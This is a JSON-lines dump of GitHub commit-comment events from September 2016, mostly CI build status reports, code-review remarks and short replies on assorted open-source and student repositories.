{"id":"4638309373","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19226672,"position":null,"line":null,"path":null,"commit_id":"1f5afbd7a951d72bdb5a34389752ab1bac63bee5","created_at":"2016-09-29T16:14:54Z","updated_at":"2016-09-29T16:14:54Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/36354/testReport/) for this commit**"}},"created_at":"2016-09-29T16:14:54Z"}
{"id":"4638309586","type":"CommitCommentEvent","actor":{"login":"detanx"},"repo":{"name":"iotale/IOTALE"},"payload":{"comment":{"id":19226673,"position":null,"line":null,"path":null,"commit_id":"a1b25d043efa8faf4c6c474905ea71b01571e252","created_at":"2016-09-29T16:14:56Z","updated_at":"2016-09-29T16:14:56Z","body":"这个考核作业是什么意思啊？"}},"created_at":"2016-09-29T16:14:56Z"}
{"id":"4638309785","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19226675,"position":null,"line":null,"path":null,"commit_id":"1d4db3c56131473423c387d6d51114742dd0028e","created_at":"2016-09-29T16:14:57Z","updated_at":"2016-09-29T16:14:57Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1213](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14618&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 259, ignored: 3 Build time: 00:09:25"}},"created_at":"2016-09-29T16:14:57Z"}
{"id":"4638310480","type":"CommitCommentEvent","actor":{"login":"mellibot"},"repo":{"name":"mellirobot/anti-spam-link"},"payload":{"comment":{"id":19226678,"position":4,"line":231,"path":"bot/bot.lua","commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-29T16:15:05Z","updated_at":"2016-09-29T16:15:05Z","body":"MelliRoBot"}},"created_at":"2016-09-29T16:15:05Z"}
{"id":"4638313794","type":"CommitCommentEvent","actor":{"login":"robsoncunha"},"repo":{"name":"robsoncunha/iib-docker"},"payload":{"comment":{"id":19226685,"position":null,"line":null,"path":null,"commit_id":"b8824ad1a6e76878902d92a4ac1e84a1a6c4734c","created_at":"2016-09-29T16:15:37Z","updated_at":"2016-09-29T16:15:37Z","body":"Revisado"}},"created_at":"2016-09-29T16:15:37Z"}
{"id":"4638315096","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19226689,"position":null,"line":null,"path":null,"commit_id":"9698a485d8a5d6f6be5d3a6b1bdc5be5567a8f98","created_at":"2016-09-29T16:15:50Z","updated_at":"2016-09-29T16:15:50Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1215](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14627&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-29T16:15:50Z"}
{"id":"4638316270","type":"CommitCommentEvent","actor":{"login":"ramses0"},"repo":{"name":"ramses0/qb"},"payload":{"comment":{"id":19226692,"position":null,"line":null,"path":null,"commit_id":"7ea16bca01dc374669714d5afeb3e892e656555d","created_at":"2016-09-29T16:16:01Z","updated_at":"2016-09-29T16:16:01Z","body":"extensionVersion.js: +5\n - Limit: 1000, Prod: 501 Local: 506\n\nutility.js: +0\n - Limit: 5000, Prod: 2.1K Local: 2.1K\n\nriqGmail.js: -26\n - Limit: 1000, Prod: 698 Local: 672\n\ngmail-app.????-*-*-*-*.js: error.\n - Limit: 1500000, Prod: 4.4M Local: 0\n\ngmail-app.????-*-*-*-*.css: -265.3K\n - Limit: 1500000, Prod: 1.4M Local: 1.1M\n\n"}},"created_at":"2016-09-29T16:16:01Z"}
{"id":"4638317402","type":"CommitCommentEvent","actor":{"login":"Frikki"},"repo":{"name":"cyclejs/cyclejs"},"payload":{"comment":{"id":19226694,"position":6,"line":55,"path":"dom/src/makeDOMDriver.ts","commit_id":"c91e7c619feb187f9aed5665d291babdd896d078","created_at":"2016-09-29T16:16:12Z","updated_at":"2016-09-29T16:16:12Z","body":"@staltz \r\n\r\n> why the xs.merge?\r\n\r\n https://github.com/cyclejs/dom/pull/128#issuecomment-225429743\r\n\r\n> rootElement will receive '' from sanitation$. Is this desired?\r\n\r\nWe could probably `shamefullySendNext()` without the empty string. But the question is whether we want to clear the rootElement or just sanitise any possible hooks in the virtual tree? If the latter, we should probably create a new issue or re-open #263."}},"created_at":"2016-09-29T16:16:12Z"}
{"id":"4638318906","type":"CommitCommentEvent","actor":{"login":"jonathanwss"},"repo":{"name":"jonathanwss/crescer-2016-2"},"payload":{"comment":{"id":19226699,"position":8,"line":8,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEraTest.java","commit_id":"12d36e7742ef5d8fd656ba3be06aa34533815485","created_at":"2016-09-29T16:16:26Z","updated_at":"2016-09-29T16:16:26Z","body":"Done."}},"created_at":"2016-09-29T16:16:26Z"}
{"id":"4638319700","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19226701,"position":null,"line":null,"path":null,"commit_id":"4f3fde42d054b1ddc1acf9b5260c6ec19ce71fcb","created_at":"2016-09-29T16:16:34Z","updated_at":"2016-09-29T16:16:34Z","body":"This looks like a copy of the ATV-menu's, and doesn't make the system more clear than it was before (with the exception of network-related stuff). It's even more complicated now. \r\nFurther more: 'Tuner config' doesn't cover the contents (but neither did the old name), especially as it now also contains a lot of stream-related stuff."}},"created_at":"2016-09-29T16:16:34Z"}
{"id":"4638322508","type":"CommitCommentEvent","actor":{"login":"peterkohaut"},"repo":{"name":"peterkohaut/scummvm"},"payload":{"comment":{"id":19226706,"position":106,"line":109,"path":"engines/bladerunner/lights.cpp","commit_id":"158c077a8f031ed1a716bcc344e8577df3627761","created_at":"2016-09-29T16:17:00Z","updated_at":"2016-09-29T16:17:00Z","body":"thx, i missed that :("}},"created_at":"2016-09-29T16:17:00Z"}
{"id":"4638323668","type":"CommitCommentEvent","actor":{"login":"ishanupadhyay"},"repo":{"name":"fossasia/2017.fossasia.org"},"payload":{"comment":{"id":19226709,"position":null,"line":null,"path":null,"commit_id":"9264a744af2d566ab7bf8f6719349f93324f6fc2","created_at":"2016-09-29T16:17:11Z","updated_at":"2016-09-29T16:17:11Z","body":"\r\n\r\n <!DOCTYPE html>\r\n <html>\r\n \t<head>\r\n \t\t<meta charset=\"utf-8\" />\r\n \t\t<meta http-equiv=\"refresh\" content=\"0; url=http://www.eventnook.com/event/fossasia17/register\"/>\r\n \t\t<title>Registration for FOSSASIA</title>\r\n        <marquee >Register for the opentechsummit 2017 and explore yourself</marquee>\r\n \r\n \t\t<meta name=\"description\" content=\"FOSSASIA Registration\" />\r\n \r\n \t\t<meta name=\"keywords\" content=\"FOSSASIA Registration\" />\r\n \t\t<meta name=\"generator\" content=\"FOSSASIA Registration\" />\r\n         <script>\r\n \t\t (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){\r\n \t\t (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),\r\n \t\t m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)\r\n \t\t })(window,document,'script','//www.google-analytics.com/analytics.js','ga');\r\n \r\n \t\t ga('create', 'UA-17146009-5', 'auto');\r\n \t\t ga('send', 'pageview');\r\n \t\t</script>\t\t\r\n \t</head>\r\n \t<body>\r\n \t\r\n \t</body>\r\n </html>\r\n#5 "}},"created_at":"2016-09-29T16:17:11Z"}
{"id":"4638327400","type":"CommitCommentEvent","actor":{"login":"cassiofariasmachado"},"repo":{"name":"cassiofariasmachado/crescer-2016-2"},"payload":{"comment":{"id":19226722,"position":25,"line":25,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"b1897577365258e01af792a133d9713a78b76494","created_at":"2016-09-29T16:17:48Z","updated_at":"2016-09-29T16:17:48Z","body":"Ok, refatorado o algoritmo."}},"created_at":"2016-09-29T16:17:48Z"}
{"id":"4638328752","type":"CommitCommentEvent","actor":{"login":"josemvm"},"repo":{"name":"3liz/lizmap-web-client"},"payload":{"comment":{"id":19226723,"position":null,"line":null,"path":null,"commit_id":"43928e32c482fae4d20a70e1f4325582868ca8b1","created_at":"2016-09-29T16:18:02Z","updated_at":"2016-09-29T16:18:02Z","body":"hi @rldhont,\r\n\r\nthanks for these new improvements!\r\n\r\ni noticed that after this commit the print tool doesn´t work (a trouble with map.js file...).\r\nthe browser shows this message:\r\n\r\n-<ServiceExceptionReport version=\"1.3.0\">\r\n -<ServiceException code=\"InvalidFormat\">\r\n       Output format 'undefined' is not supported in the GetPrint request\r\n  </ServiceException></ServiceExceptionReport>\r\n\r\nthanks for your attention"}},"created_at":"2016-09-29T16:18:02Z"}
{"id":"4638329207","type":"CommitCommentEvent","actor":{"login":"devimc"},"repo":{"name":"hyperhq/hyperstart"},"payload":{"comment":{"id":19226727,"position":186,"line":325,"path":"src/init.c","commit_id":"6a15977238bc34b3c3c98e52be6128893efc1936","created_at":"2016-09-29T16:18:07Z","updated_at":"2016-09-29T16:18:07Z","body":"Hi @gao-feng \r\nQ. why umount and mount /proc ?  if fail, why it can not continue?\r\nThank you\r\n"}},"created_at":"2016-09-29T16:18:07Z"}
{"id":"4638329468","type":"CommitCommentEvent","actor":{"login":"woodmicha"},"repo":{"name":"K-Phoen/python-fitparse"},"payload":{"comment":{"id":19226729,"position":null,"line":null,"path":null,"commit_id":"601301520ece724330c2d1d722a758393ebf80c4","created_at":"2016-09-29T16:18:09Z","updated_at":"2016-09-29T16:18:09Z","body":"You may want to include this change in the distribution as I had to do it myself after pip install.  Thanks  for putting time in on this project BTW!"}},"created_at":"2016-09-29T16:18:09Z"}
{"id":"4638329806","type":"CommitCommentEvent","actor":{"login":"lydell"},"repo":{"name":"postcss/postcss"},"payload":{"comment":{"id":19226730,"position":null,"line":null,"path":null,"commit_id":"fcce3bd658fe22674787ef5d6175922ebb5424b2","created_at":"2016-09-29T16:18:12Z","updated_at":"2016-09-29T16:18:12Z","body":"Hi! I read on Twitter that you did this as a [\"backport\" of the changes in babel-code-frame](https://twitter.com/andreysitnik/status/781420332779466752). I just wanted to point out a few differences:\r\n\r\n1. babel-code-frame does not highlight the token at the error location with red background. It just appears to be so in the example screen shot. Instead, all invalid tokens are highlighted that way. For example, `#` is an invalid token in JS. Your screen shot on Twitter is confusing, because it makes me think that something is wrong with `32px` while the real error is a missing semi-colon. (Separate issue: Why does the error point to the beginning of `32px` rather than directly after it?)\r\n\r\n2. babel-code-frame does not highlight punctuation in bold. Why? Because it looks bad on Ubuntu based systems (see babel/babel#4572 for screen shots and discussion). Instead, `chalk.yellow` is used.\r\n\r\n3. babel-code-frame no longer highlights `{}()[]` in any way, because few editor color schemes do.\r\n\r\n4. babel-code-frame now highlights strings with `chalk.green` (instead of red). See babel/babel#4579. Since at-words are colored red too in postcss, they should be changed as well.\r\n\r\n5. babel-code-frame now highlights capitalized words with `chalk.yellow`. Perhaps we should highlight some words of CSS too; perhaps class names or property names.\r\n\r\nSince the whole reason for making this commit seems to be to align with babel-code-frame, would you accept a PR for \"fixing\" some of the above? :)"}},"created_at":"2016-09-29T16:18:12Z"}
{"id":"4638330148","type":"CommitCommentEvent","actor":{"login":"gabrielRosa"},"repo":{"name":"gabrielRosa/crescer-2016-2"},"payload":{"comment":{"id":19226731,"position":13,"line":13,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"46a58f0ec5e012fd33ef803b8da010517e7fa11a","created_at":"2016-09-29T16:18:16Z","updated_at":"2016-09-29T16:18:16Z","body":"Também gostaria de saber. Já estou corrigindo."}},"created_at":"2016-09-29T16:18:16Z"}
{"id":"4638330674","type":"CommitCommentEvent","actor":{"login":"cassiofariasmachado"},"repo":{"name":"cassiofariasmachado/crescer-2016-2"},"payload":{"comment":{"id":19226733,"position":12,"line":38,"path":"src/modulo-01-java-OO/modulo-01/Dwarf.java","commit_id":"6991f75da081bfe51c72a89675c5292aa3c96118","created_at":"2016-09-29T16:18:22Z","updated_at":"2016-09-29T16:18:22Z","body":"Ok, refatorado."}},"created_at":"2016-09-29T16:18:22Z"}
{"id":"4638332081","type":"CommitCommentEvent","actor":{"login":"SirSeim"},"repo":{"name":"SirSeim/SPFY"},"payload":{"comment":{"id":19226738,"position":null,"line":null,"path":null,"commit_id":"ae7fef38c01f75b33455d9dd1eb3091f17cf106c","created_at":"2016-09-29T16:18:36Z","updated_at":"2016-09-29T16:18:36Z","body":"Actually its \r\nNew Dependency `mysql`"}},"created_at":"2016-09-29T16:18:36Z"}
{"id":"4638332200","type":"CommitCommentEvent","actor":{"login":"macool"},"repo":{"name":"noggalito/porttare-backend"},"payload":{"comment":{"id":19226739,"position":15,"line":15,"path":"app/models/provider_dispatcher.rb","commit_id":"b443af75ba0f91f19088bee17565088b638d96a0","created_at":"2016-09-29T16:18:38Z","updated_at":"2016-09-29T16:18:38Z","body":"esto está mal. `belongs_to :provider_profile`"}},"created_at":"2016-09-29T16:18:38Z"}
{"id":"4638334158","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19226743,"position":null,"line":null,"path":null,"commit_id":"3afffb070cf95e7829fc19a7a37fe610820192d3","created_at":"2016-09-29T16:18:56Z","updated_at":"2016-09-29T16:18:56Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1214](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14621&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 259, ignored: 3 Build time: 00:10:15"}},"created_at":"2016-09-29T16:18:56Z"}
{"id":"4638334284","type":"CommitCommentEvent","actor":{"login":"saidhi009"},"repo":{"name":"saidhi009/ProgrammingAssignment2"},"payload":{"comment":{"id":19226744,"position":null,"line":null,"path":null,"commit_id":"437ed03a750aeaa7076b49c44e61216a1a3c2088","created_at":"2016-09-29T16:18:58Z","updated_at":"2016-09-29T16:18:58Z","body":"### Introduction\r\n  \r\n  This second programming assignment will require you to write an R\r\n -function that is able to cache potentially time-consuming computations. For\r\n -example, taking the mean of a numeric vector is typically a fast\r\n +function that is able to cache potentially time-consuming computations.\r\n +For example, taking the mean of a numeric vector is typically a fast\r\n  operation. However, for a very long vector, it may take too long to\r\n  compute the mean, especially if it has to be computed repeatedly (e.g.\r\n  in a loop). If the contents of a vector are not changing, it may make\r\n  sense to cache the value of the mean so that when we need it again, it\r\n  can be looked up in the cache rather than recomputed. In this\r\n -Programming Assignment you will take advantage of the scoping rules of the R\r\n -language and how they can be manipulated to preserve state inside of an\r\n -R object.\r\n +Programming Assignment you will take advantage of the scoping rules of\r\n +the R language and how they can be manipulated to preserve state inside\r\n +of an R object.\r\n  \r\n  ### Example: Caching the Mean of a Vector\r\n  \r\n @@ -76,8 +76,8 @@ Write the following functions:\r\n      that can cache its inverse.\r\n  2.  `cacheSolve`: This function computes the inverse of the special\r\n      \"matrix\" returned by `makeCacheMatrix` above. If the inverse has\r\n -    already been calculated (and the matrix has not changed), then the\r\n -    `cachesolve` should retrieve the inverse from the cache.\r\n +    already been calculated (and the matrix has not changed), then\r\n +    `cacheSolve` should retrieve the inverse from the cache.\r\n  \r\n  Computing the inverse of a square matrix can be done with the `solve`\r\n  function in R. For example, if `X` is a square invertible matrix, then\r\n `solve(X)` returns its inverse.\r\n \r\n For this assignment, assume that the matrix supplied is always\r\n invertible.\r\n \r\n In order to complete this assignment, you must do the following:\r\n \r\n 1.  Fork the GitHub repository containing the stub R files at\r\n     [https://github.com/rdpeng/ProgrammingAssignment2](https://github.com/rdpeng/ProgrammingAssignment2)\r\n     to create a copy under your own account.\r\n 2.  Clone your forked GitHub repository to your computer so that you can\r\n     edit the files locally on your own machine.\r\n 3.  Edit the R file contained in the git repository and place your\r\n     solution in that file (please do not rename the file).\r\n 4.  Commit your completed R file into YOUR git repository and push your\r\n     git branch to the GitHub repository under your account.\r\n 5.  Submit to Coursera the URL to your GitHub repository that contains\r\n     the completed R code for the assignment.\r\n \r\n ### Grading"}},"created_at":"2016-09-29T16:18:58Z"}
{"id":"4638335696","type":"CommitCommentEvent","actor":{"login":"Omega094"},"repo":{"name":"nirvananoob/leetcode"},"payload":{"comment":{"id":19226748,"position":null,"line":null,"path":null,"commit_id":"529cd16e4c40b3ec548613c2b1f7f4a726b84829","created_at":"2016-09-29T16:19:12Z","updated_at":"2016-09-29T16:19:12Z","body":"强无敌\r\n@puchai"}},"created_at":"2016-09-29T16:19:12Z"}
{"id":"4638337142","type":"CommitCommentEvent","actor":{"login":"blackio"},"repo":{"name":"blackio/hazy-shade"},"payload":{"comment":{"id":19226753,"position":2,"line":2,"path":"src/page/footer/footer__social.pug","commit_id":"bcf452b1abb96bd0c788a285f2b0b0a54c04fcba","created_at":"2016-09-29T16:19:27Z","updated_at":"2016-09-29T16:19:27Z","body":"fixed"}},"created_at":"2016-09-29T16:19:27Z"}
{"id":"4638347382","type":"CommitCommentEvent","actor":{"login":"adarsh"},"repo":{"name":"adarsh/blog"},"payload":{"comment":{"id":19226772,"position":null,"line":null,"path":null,"commit_id":"09fca61c707599fa0cd86668465698d8484ebf4b","created_at":"2016-09-29T16:21:06Z","updated_at":"2016-09-29T16:21:06Z","body":"It's like, I forget about it, but park somewhere in my brain that I know it\nexists, then rediscover it again every few years.\n\n\n\n-- \n@adarshp <http://www.twitter.com/adarshp>\n313.454.1515 (mobile)\n\nOn Thu, Sep 29, 2016 at 9:06 AM, Gabe Berke-Williams <\nnotifications@github.com> wrote:\n\n> zmv 😍\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/adarsh/blog/commit/09fca61c707599fa0cd86668465698d8484ebf4b#commitcomment-19226534>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AA3xXXBZta-TVqmrIPsv-gZqxeLHzohGks5qu-H-gaJpZM4KKLVF>\n> .\n>\n"}},"created_at":"2016-09-29T16:21:06Z"}
{"id":"4638349484","type":"CommitCommentEvent","actor":{"login":"kAworu"},"repo":{"name":"dlbeer/quirc"},"payload":{"comment":{"id":19226774,"position":null,"line":null,"path":null,"commit_id":"87e79e769b90de65037226bb495207730c8fb42a","created_at":"2016-09-29T16:21:25Z","updated_at":"2016-09-29T16:21:25Z","body":"@dlbeer I'll definitely test this. I had decoding issue with some QR codes even without logo in the middle or so, I'll provide some cases if they are still unrecognized. Thanks !"}},"created_at":"2016-09-29T16:21:25Z"}
{"id":"4638351902","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19226780,"position":null,"line":null,"path":null,"commit_id":"4c9d6740427a8e5232e9fa3180bdcabc576c3867","created_at":"2016-09-29T16:21:47Z","updated_at":"2016-09-29T16:21:47Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/36355/testReport/) for this commit**"}},"created_at":"2016-09-29T16:21:47Z"}
{"id":"4638352545","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19226781,"position":null,"line":null,"path":null,"commit_id":"1a9714483ac527ec3f65b9c135bae8717851e403","created_at":"2016-09-29T16:21:53Z","updated_at":"2016-09-29T16:21:53Z","body":"input_processor_refactor (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1218 of 1219 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a9714483ac527ec3f65b9c135bae8717851e403-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a9714483ac527ec3f65b9c135bae8717851e403-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.92%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a9714483ac527ec3f65b9c135bae8717851e403-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.05%25-green.svg)</a>\n"}},"created_at":"2016-09-29T16:21:53Z"}
{"id":"4638356196","type":"CommitCommentEvent","actor":{"login":"gabrielhenz"},"repo":{"name":"gabrielhenz/crescer-2016-2"},"payload":{"comment":{"id":19226787,"position":4,"line":6,"path":"src/modulo-01-java-OO/modulo-01/Elfo.java","commit_id":"b53edf02c388b99e255888b46406477ac6cf8f73","created_at":"2016-09-29T16:22:27Z","updated_at":"2016-09-29T16:22:27Z","body":"Pronto, removi o 'static', usarei quando aprendermos. :)"}},"created_at":"2016-09-29T16:22:27Z"}
{"id":"4638358867","type":"CommitCommentEvent","actor":{"login":"tochman"},"repo":{"name":"CraftAcademy/sf-online-august"},"payload":{"comment":{"id":19226791,"position":1,"line":1,"path":"app/controllers/menu_controller.rb","commit_id":"0aa2b354f33daa8a5751e0f2e92300e8a4544598","created_at":"2016-09-29T16:22:53Z","updated_at":"2016-09-29T16:22:53Z","body":"I was under the impression that this controller was renamed to `MenusController`  in a separate PR?"}},"created_at":"2016-09-29T16:22:53Z"}
{"id":"4638363583","type":"CommitCommentEvent","actor":{"login":"kerphi"},"repo":{"name":"istex/istex-view"},"payload":{"comment":{"id":19226801,"position":null,"line":null,"path":null,"commit_id":"351c4d9bc6696af9d34885b18124504b49aea70d","created_at":"2016-09-29T16:23:39Z","updated_at":"2016-09-29T16:23:39Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Trouver une solution pour que les URL view.istex.fr/ark:/XXX pointent toutes vers index.html](https://trello.com/c/1yVI4eLL/1-trouver-une-solution-pour-que-les-url-view-istex-fr-ark-xxx-pointent-toutes-vers-index-html)"}},"created_at":"2016-09-29T16:23:39Z"}
{"id":"4638367704","type":"CommitCommentEvent","actor":{"login":"kAworu"},"repo":{"name":"dlbeer/quirc"},"payload":{"comment":{"id":19226812,"position":null,"line":null,"path":null,"commit_id":"a8291391ec2cca1feff0cd825bfad7198b3e182f","created_at":"2016-09-29T16:24:20Z","updated_at":"2016-09-29T16:24:20Z","body":"Maybe then `data->ecc_level` needs to be printed more safely too?"}},"created_at":"2016-09-29T16:24:20Z"}
{"id":"4638372447","type":"CommitCommentEvent","actor":{"login":"deltakosh"},"repo":{"name":"Microsoft/UWPCommunityToolkit"},"payload":{"comment":{"id":19226821,"position":null,"line":null,"path":null,"commit_id":"c5b2742c49a4922ca625060af0f69ef1afc43b7a","created_at":"2016-09-29T16:25:05Z","updated_at":"2016-09-29T16:25:05Z","body":"It's fixed by this PR:https://github.com/Microsoft/UWPCommunityToolkit/pull/409"}},"created_at":"2016-09-29T16:25:05Z"}
{"id":"4638373250","type":"CommitCommentEvent","actor":{"login":"sai7anils"},"repo":{"name":"sai7anils/demo"},"payload":{"comment":{"id":19226822,"position":null,"line":null,"path":null,"commit_id":"d77bc0103ee418895e1f7bccc528bf6ae3c662bd","created_at":"2016-09-29T16:25:13Z","updated_at":"2016-09-29T16:25:13Z","body":"This first demo check in"}},"created_at":"2016-09-29T16:25:13Z"}
{"id":"4638376678","type":"CommitCommentEvent","actor":{"login":"ai"},"repo":{"name":"postcss/postcss"},"payload":{"comment":{"id":19226826,"position":null,"line":null,"path":null,"commit_id":"fcce3bd658fe22674787ef5d6175922ebb5424b2","created_at":"2016-09-29T16:25:45Z","updated_at":"2016-09-29T16:25:45Z","body":"@lydell great overview as usual :)\r\n\r\n1. Yeap, in PostCSS we have only one invalid token. Babel way i better, but I think we could ignore it. Maybe we could remove background highlight. Yeap, maybe we could improve `missed ;` error position.\r\n2. Ubuntu compatibility is important. But are you sure, that babel-code-frame doesn’t use bold? https://github.com/babel/babel/blob/master/packages/babel-code-frame/src/index.js#L21\r\n3. Current PostCSS syntax highlight is very simple. We highlight `{}()[]`, because we didn’t highligh property names :D.\r\n4. Sure, let’s replace string color. I don’t like red highlight for strings too.\r\n5. Yeap, but it is tricky question, how find property names or selectors, when we have only tokens. How do you parse broken string?"}},"created_at":"2016-09-29T16:25:45Z"}
{"id":"4638379035","type":"CommitCommentEvent","actor":{"login":"varunash010"},"repo":{"name":"varunash010/hello-world-sample"},"payload":{"comment":{"id":19226829,"position":null,"line":null,"path":null,"commit_id":"bbc4f47380390a5855b786efa645eceb4fc40edb","created_at":"2016-09-29T16:26:10Z","updated_at":"2016-09-29T16:26:10Z","body":"hello"}},"created_at":"2016-09-29T16:26:10Z"}
{"id":"4638382325","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19226837,"position":null,"line":null,"path":null,"commit_id":"9698a485d8a5d6f6be5d3a6b1bdc5be5567a8f98","created_at":"2016-09-29T16:26:41Z","updated_at":"2016-09-29T16:26:41Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1215](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14627&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 235, ignored: 3 Build time: 00:10:51\n### Failed tests\n```\norg.genivi.sota.core.DeviceUpdatesResourceSpec.GET to download file returns the file contents: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-29T16:26:41Z"}
{"id":"4638383327","type":"CommitCommentEvent","actor":{"login":"henriquementz"},"repo":{"name":"henriquementz/crescer-2016-2"},"payload":{"comment":{"id":19226841,"position":14,"line":14,"path":"src/modulo-01-java-OO/modulo-01/DataTerceiraEra.java","commit_id":"12cb828f5d96010fcf6735d985473b8ebded054c","created_at":"2016-09-29T16:26:51Z","updated_at":"2016-09-29T16:26:51Z","body":"Corrigido!"}},"created_at":"2016-09-29T16:26:51Z"}
{"id":"4638384194","type":"CommitCommentEvent","actor":{"login":"bornhaeusser"},"repo":{"name":"MarkusHiller/OpenSoccer"},"payload":{"comment":{"id":19226843,"position":null,"line":null,"path":null,"commit_id":"dd1e57a7b7bfb61d1354b33735135b2fe9f3d807","created_at":"2016-09-29T16:27:00Z","updated_at":"2016-09-29T16:27:00Z","body":"super!!!!! Klappt ohne Anpassung!!!"}},"created_at":"2016-09-29T16:27:00Z"}
{"id":"4638386165","type":"CommitCommentEvent","actor":{"login":"jakoinni841"},"repo":{"name":"jakoinni841/Greeting-Card"},"payload":{"comment":{"id":19226852,"position":23,"line":36,"path":"WindowsFormsApplication1/Form1.cs","commit_id":"2f590935f73e94d2d0032f1374c19b86b1ea993a","created_at":"2016-09-29T16:27:19Z","updated_at":"2016-09-29T16:27:19Z","body":"I meant to space between the / and R not inbetween both slashes."}},"created_at":"2016-09-29T16:27:19Z"}
{"id":"4638388989","type":"CommitCommentEvent","actor":{"login":"LeonardoAlmeida96"},"repo":{"name":"LeonardoAlmeida96/crescer-2016-2"},"payload":{"comment":{"id":19226864,"position":null,"line":null,"path":null,"commit_id":"5cc4f1aaab6b833ca14c0d5c3eb759ee29242887","created_at":"2016-09-29T16:27:46Z","updated_at":"2016-09-29T16:27:46Z","body":"Foi criado os novos testes."}},"created_at":"2016-09-29T16:27:46Z"}
{"id":"4638389242","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19226866,"position":null,"line":null,"path":null,"commit_id":"4f3fde42d054b1ddc1acf9b5260c6ec19ce71fcb","created_at":"2016-09-29T16:27:48Z","updated_at":"2016-09-29T16:27:48Z","body":"Re-working the menu-structure is the perfect moment to introduce a menu-sorting option (e.g. like PLi has done). In this new structure it's even more required then before, due to the menu sub-menu's."}},"created_at":"2016-09-29T16:27:48Z"}
{"id":"4638389484","type":"CommitCommentEvent","actor":{"login":"gidili"},"repo":{"name":"openworm/org.geppetto.frontend"},"payload":{"comment":{"id":19226869,"position":7,"line":217,"path":"src/main/webapp/js/tests/casperjs/geppetto-tests.js","commit_id":"a8bae8571e3d5351dd9801b75c43d503c32c94b0","created_at":"2016-09-29T16:27:50Z","updated_at":"2016-09-29T16:27:50Z","body":"@jrmartin I asked because when I was fixing some of those casper tests I was just doing $('selector') and it was already there and didn't have to add anything"}},"created_at":"2016-09-29T16:27:50Z"}
{"id":"4638389819","type":"CommitCommentEvent","actor":{"login":"dejIO"},"repo":{"name":"systemd/systemd"},"payload":{"comment":{"id":19226870,"position":null,"line":null,"path":null,"commit_id":"531ac2b2349da02acc9c382849758e07eb92b020","created_at":"2016-09-29T16:27:53Z","updated_at":"2016-09-29T16:27:53Z","body":"Just for fun: https://www.reddit.com/r/linux/comments/54yfcd/how_to_crash_systemd_in_one_tweet/d86p8vn"}},"created_at":"2016-09-29T16:27:53Z"}
{"id":"4638391601","type":"CommitCommentEvent","actor":{"login":"ssteinerx"},"repo":{"name":"pydanny/cookiecutter-django"},"payload":{"comment":{"id":19226874,"position":null,"line":null,"path":null,"commit_id":"5815865703a8e2062d262989083f211e278e8231","created_at":"2016-09-29T16:28:11Z","updated_at":"2016-09-29T16:28:11Z","body":"That's a heck of a commit!  Good work!"}},"created_at":"2016-09-29T16:28:11Z"}
